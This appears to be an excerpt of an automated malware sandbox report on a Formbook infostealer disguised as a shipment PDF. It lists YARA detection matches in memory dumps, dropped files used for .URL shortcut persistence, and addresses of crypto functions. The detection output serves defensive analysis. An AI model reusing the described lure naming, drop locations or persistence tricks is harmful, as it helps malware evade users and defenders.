Source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.323136617.0000000002760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.340669316.0000000000473000.00000008.00020000.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0000000E.00000003.314083607.0000000002E64000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000012.00000000.339113202.0000000000471000.00000008.00020000.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.301666823.0000000003B9C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.530165789.0000000003416000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000011.00000000.320572808.0000000000471000.00000008.00020000.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000003.299620122.0000000002D34000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000001.00000000.260851932.0000000000471000.00000008.00020000.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.299850141.00000000028B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.342364275.0000000002540000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.289777084.0000000000471000.00000008.00020000.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.342777768.0000000002E18000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000003.262859681.0000000002E84000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000001.00000002.300537676.0000000002E38000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.323669387.0000000002CE8000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Original Shipment Doc Ref 2853801324189923,PDF.exe PID: 5904, type: MEMORYSTR	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: Process Memory Space: Nyedvqj.exe PID: 6664, type: MEMORYSTR	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: Process Memory Space: Nyedvqj.exe PID: 6824, type: MEMORYSTR	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: Process Memory Space: netsh.exe PID: 2848, type: MEMORYSTR	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\Public\Libraries\jqvdeyN.url, type: DROPPED	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe, type: DROPPED	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =

Detected potential crypto function

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00401030	11_2_00401030
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041B8D6	11_2_0041B8D6
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041C937	11_2_0041C937
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041C254	11_2_0041C254
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041CB9E	11_2_0041CB9E
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041C425	11_2_0041C425
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00408C80	11_2_00408C80
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041C51F	11_2_0041C51F
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041C5F3	11_2_0041C5F3
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00402D8B	11_2_00402D8B
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00402D90	11_2_00402D90
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041C686	11_2_0041C686
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041C74A	11_2_0041C74A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041CF70	11_2_0041CF70
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041C776	11_2_0041C776
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00402FB0	11_2_00402FB0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB20A0	11_2_00BB20A0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B9B090	11_2_00B9B090
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C520A8	11_2_00C520A8
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41002	11_2_00C41002
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BA4120	11_2_00BA4120
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B8F900	11_2_00B8F900
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C522AE	11_2_00C522AE
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBEBB0	11_2_00BBEBB0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B9841F	11_2_00B9841F
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00401030	17_2_00401030
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041B8D6	17_2_0041B8D6
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041C937	17_2_0041C937
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041C254	17_2_0041C254
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041CB9E	17_2_0041CB9E
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041C425	17_2_0041C425
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00408C80	17_2_00408C80
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041C51F	17_2_0041C51F
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041C5F3	17_2_0041C5F3
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00402D8B	17_2_00402D8B
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00402D90	17_2_00402D90
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041C686	17_2_0041C686
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041C74A	17_2_0041C74A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041CF70	17_2_0041CF70
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041C776	17_2_0041C776
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00402FB0	17_2_00402FB0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A020A0	17_2_00A020A0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA20A8	17_2_00AA20A8
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009EB090	17_2_009EB090
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91002	17_2_00A91002
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DF900	17_2_009DF900
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009F4120	17_2_009F4120
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA22AE	17_2_00AA22AE
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0EBB0	17_2_00A0EBB0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A9DBD2	17_2_00A9DBD2
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA2B28	17_2_00AA2B28
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E841F	17_2_009E841F
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A02581	17_2_00A02581
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA25DD	17_2_00AA25DD
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009ED5E0	17_2_009ED5E0
